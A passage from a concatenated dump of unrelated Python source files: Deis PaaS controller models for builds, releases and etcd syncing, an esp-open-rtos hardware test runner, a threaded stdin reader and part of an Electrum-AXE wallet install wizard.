kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
job_id = self._job_id
try:
self._scheduler.create(
name=job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source=[CREATED, UP, DOWN], target=UP, on_error=CRASHED)
def start(self):
job_id = self._job_id
try:
self._scheduler.start(job_id)
except Exception as e:
err = '{} (start): {}'.format(job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@transition(field=state, source=UP, target=DOWN, on_error=ERROR)
def stop(self):
job_id = self._job_id
try:
self._scheduler.stop(job_id)
except Exception as e:
err = '{} (stop): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@transition(field=state, source='*', target=DESTROYED, on_error=ERROR)
def destroy(self):
job_id = self._job_id
try:
self._scheduler.destroy(job_id)
except Exception as e:
err = '{} (destroy): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
job_id = self._job_id
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
initial = True if self.app.structure == {} else False
try:
self.app.deploy(user, new_release, initial=initial)
return new_release
except RuntimeError:
new_release.delete()
raise
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
logger.info(e)
pass
return release
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = '{}:{}'.format(self.build.image, source_tag)
# IOW, this image did not come from the builder
# FIXME: remove check for mock registry module
if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE:
# we assume that the image is not present on our registry,
# so shell out a task to pull in the repository
data = {
'src': self.build.image
}
requests.post(
'{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL,
self.app.id),
data=data,
)
# update the source image to the repository we just imported
source_image = self.app.id
# if the image imported had a tag specified, use that tag as the source
if ':' in self.build.image:
if '/' not in self.build.image[self.build.image.rfind(':') + 1:]:
source_image += self.build.image[self.build.image.rfind(':'):]
publish_release(source_image,
self.config.values,
self.image)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
raise EnvironmentError('version cannot be below 0')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'id'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
log_event(build.app, "build {} created".format(build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
log_event(release.app, "release {} created".format(release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
log_event(config.app, "config {} updated".format(config))
def _log_domain_added(**kwargs):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
# adding a domain does not create a release, so we have to log here
domain.app.log(msg)
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_create_app(**kwargs):
appname = kwargs['instance']
if kwargs['created']:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
def _etcd_publish_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
def _etcd_purge_domains(**kwargs):
app = kwargs['instance'].app
app_domains = app.domain_set.all()
if app_domains:
_etcd_client.write('/deis/domains/{}'.format(app),
' '.join(str(d.domain) for d in app_domains))
else:
_etcd_client.delete('/deis/domains/{}'.format(app))
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# save FSM transitions as they happen
def _save_transition(**kwargs):
kwargs['instance'].save()
# close database connections after transition
# to avoid leaking connections inside threads
from django.db import connection
connection.close()
post_transition.connect(_save_transition)
# wire up etcd publishing if we can connect
try:
_etcd_client = etcd.Client(host=settings.ETCD_HOST, port=int(settings.ETCD_PORT))
_etcd_client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
_etcd_client = None
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
|
test_runner.py | #!/usr/bin/env python3
import sys
import argparse
import subprocess
import os
import serial
import threading
import re
import time
SHORT_OUTPUT_TIMEOUT = 0.25 # timeout for resetting and/or waiting for more lines of output
TESTCASE_TIMEOUT = 60
TESTRUNNER_BANNER = "esp-open-rtos test runner."
RESET_RETRIES = 10 # retries to receive test runner banner after reset
def run(env_a, env_b, cases):
counts = dict((status, 0) for status in TestResult.STATUS_NAMES.keys())
failures = False
for test in cases:
if test.case_type == 'dual':
if env_b is None:
res = TestResult(TestResult.SKIPPED, 'Dual test case skipped')
else:
res = test.run(env_a, env_b)
else:
res = test.run(env_a)
counts[res.status] += 1
failures = failures or res.is_failure()
print("%20s: %d" % ("Total tests", sum(c for c in counts.values())))
print()
# print status counts for tests
for c in sorted(counts.keys()):
print("%20s: %d" % (TestResult.STATUS_NAMES[c], counts[c]))
return failures == 0
def main():
global verbose
args = parse_args()
verbose = args.verbose
if not args.no_flash:
flash_image(args.aport)
if args.type != 'solo':
flash_image(args.bport)
env = TestEnvironment(args.aport, TestEnvironment.A)
env_b = None
cases = env.get_testlist()
if args.type != 'solo':
env_b = TestEnvironment(args.bport, TestEnvironment.B)
cases_b = env_b.get_testlist()
if cases != cases_b:
raise TestRunnerError("Test cases on units A & B don't match")
if args.list: # if list option is specified, do not run test cases
print("List of test cases:")
for test in cases:
print(test)
sys.exit(0)
if args.testcases: # if testcases is specified run only those cases
cases = [c for c in cases if str(c.index) in args.testcases]
sys.exit(0 if run(env, env_b, cases) else 1)
class TestCase(object):
def __init__(self, index, name, case_type):
self.name = name
self.index = index
self.case_type = case_type
def __repr__(self):
return "#%d: %s (%s)" % (self.index, self.name, self.case_type)
def __eq__(self, other):
return (self.index == other.index and
self.name == other.name and
self.case_type == other.case_type)
def run(self, env_a, env_b=None):
"""
Run the test represented by this instance, against the environment(s) passed in.
Returns a TestResult
"""
sys.stdout.write("Running test case '%s'...%s" % (self.name, "\n" if verbose else " "*(40-len(self.name))))
mon_a = env_a.start_testcase(self)
mon_b = env_b.start_testcase(self) if env_b else None
while True:
if mon_a.get_result() and (mon_b is None or mon_b.get_result()):
break # all running test environments have finished
# or, in the case both are running, stop as soon as either environemnt shows a failure
try:
if mon_a.get_result().is_failure():
mon_b.cancel()
break
except AttributeError:
pass
try:
if mon_b.get_result().is_failure():
mon_a.cancel()
break
except AttributeError:
pass
time.sleep(0.1)
if mon_b is not None:
# return whichever result is more severe
res = max(mon_a.get_result(), mon_b.get_result())
else:
res = mon_a.get_result()
if not verbose: # finish the line after the ...
print(TestResult.STATUS_NAMES[res.status])
if res.is_failure():
message = res.message
if "/" in res.message: # cut anything before the file name in the failure
message = message[message.index("/"):]
print("FAILURE MESSAGE:\n%s\n" % message)
return res
class TestResult(object):
""" Class to wrap a test result code and a message """
# Test status flags, higher = more severe
CANCELLED = 0
SKIPPED = 1
PASSED = 2
FAILED = 3
ERROR = 4
STATUS_NAMES = {
CANCELLED: "Cancelled",
SKIPPED: "Skipped",
PASSED: "Passed",
FAILED: "Failed",
ERROR: "Error"
}
def __init__(self, status, message):
self.status = status
self.message = message
def is_failure(self):
return self.status >= TestResult.FAILED
def __qe__(self, other):
if other is None:
return False
else:
return self.status == other.status
def __lt__(self, other):
if other is None:
return False
else:
return self.status < other.status
class TestMonitor(object):
""" Class to monitor a running test case in a separate thread, defer reporting of the result until it's done.
Can poll for completion by calling is_done(), read a TestResult via .get_result()
"""
def __init__(self, port, instance):
super(TestMonitor, self).__init__()
self._thread = threading.Thread(target=self._monitorThread)
self._port = port
self._instance = instance
self._result = None
self._cancelled = False
self.output = ""
self._thread.start()
def cancel(self):
self._cancelled = True
def is_done(self):
return self._result is not None
def get_result(self):
return self._result
def _monitorThread(self):
self.output = ""
start_time = time.time()
self._port.timeout = SHORT_OUTPUT_TIMEOUT
try:
while not self._cancelled and time.time() < start_time + TESTCASE_TIMEOUT:
line = self._port.readline().decode("utf-8", "ignore")
if line == "":
continue # timed out
self.output += "%s+%4.2fs %s" % (self._instance, time.time()-start_time, line)
verbose_print(line.strip())
if line.endswith(":PASS\r\n"):
self._result = TestResult(TestResult.PASSED, "Test passed.")
return
elif ":FAIL:" in line:
self._result = TestResult(TestResult.FAILED, line)
return
elif line == TESTRUNNER_BANNER:
self._result = TestResult(TestResult.ERROR, "Test caused crash and reset.")
return
if not self._cancelled:
self._result = TestResult(TestResult.CANCELLED, "Cancelled")
else:
self._result = TestResult(TestResult.ERROR, "Test timed out")
finally:
self._port.timeout = None
class TestEnvironment(object):
A = "A"
B = "B"
def __init__(self, port, instance):
self._name = port
self._port = TestSerialPort(port, baudrate=115200)
self._instance = instance
def reset(self):
""" Resets the test board, and waits for the test runner program to start up """
for i in range(RESET_RETRIES):
self._port.setDTR(False)
self._port.setRTS(True)
time.sleep(0.05)
self._port.flushInput()
self._port.setRTS(False)
verbose_print("Waiting for test runner startup...")
if self._port.wait_line(lambda line: line == TESTRUNNER_BANNER):
return
else:
verbose_print("Retrying to reset the test board, attempt=%d" %
(i + 1))
continue
raise TestRunnerError("Port %s failed to start test runner" % self._port)
def get_testlist(self):
""" Resets the test board and returns the enumerated list of all supported tests """
self.reset()
tests = []
verbose_print("Enumerating tests...")
def collect_testcases(line):
if line.startswith(">"):
return True # prompt means list of test cases is done, success
m = re.match(r"CASE (\d+) = (.+?) ([A-Z]+)", line)
if m is not None:
t = TestCase(int(m.group(1)), m.group(2), m.group(3).lower())
verbose_print(t)
tests.append(t)
if not self._port.wait_line(collect_testcases):
raise TestRunnerError("Port %s failed to read test list" % self._port)
verbose_print("Port %s found %d test cases" % (self._name, len(tests)))
return tests
def start_testcase(self, case):
""" Starts the specified test instance and returns a TestMonitor reader thread instance
to monitor the output
"""
# synchronously start the test case
self.reset()
if not self._port.wait_line(lambda line: line.startswith(">")):
raise TestRunnerError("Failed to read test runnner prompt")
command = "%s%d\r\n" % (self._instance, case.index)
self._port.write(command.encode("utf-8"))
return TestMonitor(self._port, self._instance)
def get_testdir():
"""
Return the 'tests' directory in the source tree
(assuming the test_runner.py script is in that directory.
"""
res = os.path.dirname(__name__)
return "." if res == "" else res
def flash_image(serial_port):
# Bit hacky: rather than calling esptool directly,
# just use the Makefile flash target with the correct ESPPORT argument
env = dict(os.environ)
env["ESPPORT"] = serial_port
verbose_print("Building and flashing test image to %s..." % serial_port)
try:
stdout = sys.stdout if verbose else None
subprocess.check_call(["make", "flash"], cwd=get_testdir(),
stdout=stdout, stderr=subprocess.STDOUT, env=env)
except subprocess.CalledProcessError as e:
raise TestRunnerError("'make flash EPPORT=%s' failed with exit code %d" %
(serial_port, e.returncode))
verbose_print("Flashing successful.")
def parse_args():
parser = argparse.ArgumentParser(description='esp-open-rtos testrunner', prog='test_runner')
parser.add_argument(
'--type', '-t',
help='Type of test hardware attached to serial ports A & (optionally) B',
choices=['solo', 'dual', 'eyore_test'], default='solo')
parser.add_argument(
'--aport', '-a',
help='Serial port for device A',
default='/dev/ttyUSB0')
parser.add_argument(
'--bport', '-b',
help='Serial port for device B (ignored if type is \'solo\')',
default='/dev/ttyUSB1')
parser.add_argument(
'--no-flash', '-n',
help='Don\'t flash the test binary image before running tests',
action='store_true',
default=False)
parser.add_argument(
'--list', '-l',
help='Display list of available test cases on a device',
action='store_true',
default=False)
parser.add_argument(
'--verbose', '-v',
help='Verbose test runner debugging output',
action='store_true',
default=False)
parser.add_argument('testcases', nargs='*',
help='Optional list of test case numbers to run. '
'By default, all tests are run.')
return parser.parse_args()
class TestRunnerError(RuntimeError):
def __init__(self, message):
RuntimeError.__init__(self, message)
class TestSerialPort(serial.Serial):
def __init__(self, *args, **kwargs):
super(TestSerialPort, self).__init__(*args, **kwargs)
def wait_line(self, callback, timeout=SHORT_OUTPUT_TIMEOUT):
""" Wait for the port to output a particular piece of line content, as judged by callback
Callback called as 'callback(line)' and returns not-True if non-match otherwise can return any value.
Returns first non-False result from the callback, or None if it timed out waiting for a new line.
Note that a serial port spewing legitimate lines of output may block this function forever, if callback
doesn't detect this is happening.
"""
self.timeout = timeout
try:
res = None
while not res:
line = self.readline()
if line == b"":
break # timed out
line = line.decode("utf-8", "ignore").rstrip()
res = callback(line)
return res
finally:
self.timeout = None
verbose = False
def verbose_print(msg):
if verbose:
print(msg)
if __name__ == '__main__':
try:
main()
except TestRunnerError as e:
print(e)
sys.exit(2)
|
winpty.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from io import StringIO
from queue import Queue, Empty
class WinPty(object):
def __init__(self, stdin):
self._s = stdin
self._q = Queue()
def _read_next_char(stdin, queue):
while True:
char = stdin.read(1) # potentially blocking read
if char:
queue.put(char)
else:
break
self._t = Thread(target=_read_next_char, args=(self._s, self._q))
self._t.daemon = True
self._t.start() # read characters asynchronously from stdin
def read(self, blksize=-1, timeout=1):
buf = StringIO()
count = 0
try:
while count < blksize or blksize == -1:
next = self._q.get(block=timeout is not None, timeout=timeout)
buf.write(next)
count = count + 1
except Empty:
pass
return buf.getvalue()
|
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_axe.wallet import Wallet
from electrum_axe.storage import WalletStorage
from electrum_axe.util import UserCancelled, InvalidPassword
from electrum_axe.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_axe.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-AXE - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-axe.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-AXE wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
